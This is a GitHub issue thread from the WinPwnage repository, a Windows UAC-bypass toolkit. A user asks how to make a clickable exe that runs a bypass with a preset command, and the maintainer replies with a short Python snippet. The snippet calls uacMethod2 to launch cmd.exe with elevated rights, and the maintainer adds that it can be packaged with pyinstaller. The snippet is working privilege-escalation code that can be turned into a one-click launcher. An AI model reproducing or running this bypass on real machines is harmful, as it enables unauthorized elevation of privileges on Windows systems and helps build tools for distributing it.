### ISSUE TITLE
another question. (i'm sorry) 

### ISSUE THREAD

**Issue by moom825** [rootm0s/WinPwnage#76]
how can i make it so when i click the exe it open the command prompt and runs a pre-specified command? instead of opening cmd and writing "winpwnage.exe --use uac --id 2 --payload start cmd /k whoami" but instead i just click the exe and it does that for me?

**Comment by rootm0s** [comment]
If you want it to act like that you have to create your own main.py file and build the file using pyinstaller

```
from winpwnage.functions.uac.uacMethod2 import uacMethod2
uacMethod2(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"])
```
